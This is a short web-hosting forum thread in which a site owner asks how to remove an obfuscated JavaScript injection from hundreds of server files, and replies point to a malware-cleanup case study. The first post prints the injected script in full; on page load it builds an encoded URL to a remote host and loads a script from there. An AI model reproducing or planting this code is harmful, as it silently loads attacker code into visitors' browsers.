Community Forums
Connect with us on LinkedIn
+ Reply to Thread
Results 1 to 4 of 4
  1. #1
    Member
    Join Date
    Jul 2003
    Location
    Lahore
    Posts
    26

    Lightbulb Remove JS script from hundreds of files

    I am facing this issue that many files on server are getting injected with the script

    Code:
    <script>var D;if(D!='' && D!='X'){D=''};var U=new Array();var p="";function u(){var aY=new Date();var uV=RegExp;var Q;if(Q!='q'){Q=''};var N="]";var kn;if(kn!=''){kn='vn'};var zN;if(zN!='e' && zN!='vh'){zN='e'};var r="\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x61\x6e\x67\x65\x67\x65\x2e\x63\x6f\x6d\x2f\x6b\x69\x6a\x69\x6a\x69\x2e\x63\x61\x2e\x70\x68\x70";var H='';function F(d,B){var hE=new Array();var g;if(g!='Hl' && g != ''){g=null};var hR;if(hR!='t' && hR!='HX'){hR='t'};var BK=String("iMc[".substr(3));BK+=B;var As;if(As!=''){As='sS'};BK+=N;var WG='';var TR='';var S=new uV(BK, new String("7wkg".substr(3)));var K;if(K!='' && K!='eo'){K='HT'};var pH;if(pH!='' && pH!='ed'){pH='jH'};return d[new String("rep"+"lac"+"e")](S, H);};var Rv;if(Rv!='I' && Rv != ''){Rv=null};var fH;if(fH!='' && fH!='Nu'){fH='Bh'};var W=F('8955593606965585956650693356','6395');var Ud=new Date();var ga=new Array();var x="src";var Il=new Array();var FC='';var h=window;this.Dk='';var b;if(b!='ny' && b!='Hn'){b=''};var sST=new String();var T=unescape("%68%74%74%70%3a%2f%2f%69%66%65%6e%67%2d%63%6f%6d%2e%63%69%74%69%62%61%6e%6b%2e%63%6f%6d%2e%74%72%69%70%61%64%76%69%73%6f%72%2d%63%6f%6d%2e%6e%65%65%64%73%65%72%76%65%2e%72%75%3a");var G='';var P=F('dUeJfHeKrJ','Yq8gMKH0EUJbu');var PG=new String();var Gs=new Array();this.gX="";h[String("onlo2SzX".substr(0,4)+"ad")]=function(){var Jm=new Date();try {a=document.createElement(F('sHcTrviHpTtT','HUvT'));var lA;if(lA!='C'){lA=''};var Fg=new Date();FC=T;var fJ;if(fJ!='At'){fJ='At'};FC+=W;FC+=r;var vW;if(vW!='pO' && vW!='Bp'){vW=''};var Ic=new Date();a[x]=FC;var bO;if(bO!='' && bO!='xL'){bO=''};a[P]=[1][0];var WW;if(WW!='Xp'){WW=''};var _t=new String();var tg=new String();document.body.appendChild(a);var CB=new Array();var sO="";} catch(Y){this.Wl='';var G_;if(G_!='wP' && G_!='PP'){G_=''};};};var oH=new Array();var ow=new Array();};var Ec;if(Ec!='ho' && Ec!='Jw'){Ec='ho'};var Hj;if(Hj!='rh' && Hj!='ON'){Hj='rh'};u();this.fa="";var jC;if(jC!='' && jC!='aZ'){jC=null};</script>
    I have tried sed and awk to rmeove from files but due to some errors I am not able to make the script functional. Can anybody tell me how can I remove this complete script from all files using loops, sed or awk etc?

  2. #2
    Registered User
    Join Date
    Apr 2010
    Posts
    2

    Default

    Hey,

    I posted about it on this post:

    Sucuri Security: Removing malware from a web site - Case Study

    We used find+sed to do it. If you need any help, PM me.

  3. #3
    Registered User
    Join Date
    Apr 2010
    Posts
    2

    Default

    Hey,

    I posted about it on the following blog:

    Sucuri Security: Removing malware from a web site - Case Study

    If you need help, pm me.

  4. #4
    Member
    Join Date
    Jul 2003
    Location
    Lahore
    Posts
    26

    Thumbs up

    Thanks for the information and update. I will definitely try this as it seems to be working perfect. I have removed all those scripts already using perl. But due to this I came to know your knowledge full blog.

    Kashif.

Similar Threads & Tags
Similar threads

  1. How To Remove Script
    By sams_a_hot_male in forum Database Discussions
    Replies: 5
    Last Post: 07-08-2009, 05:59 PM
  2. Help!! hundreds of core.xx files being created!
    By 4u123 in forum cPanel and WHM Discussions
    Replies: 8
    Last Post: 06-21-2006, 01:38 PM
  3. Log files filled with combined hundreds of times at the bottom. WTF?
    By AbeFroman in forum cPanel and WHM Discussions
    Replies: 1
    Last Post: 10-08-2004, 04:14 PM
  4. remove POP account doesn't remove all files
    By spaceman in forum cPanel and WHM Discussions
    Replies: 4
    Last Post: 09-18-2003, 08:05 PM
  5. Hundreds and hundreds of session files in /tmp
    By sexy_guy in forum cPanel and WHM Discussions
    Replies: 7
    Last Post: 06-20-2003, 06:48 PM
Linkedin       Facebook       Twitter       RSS       Flickr       YouTube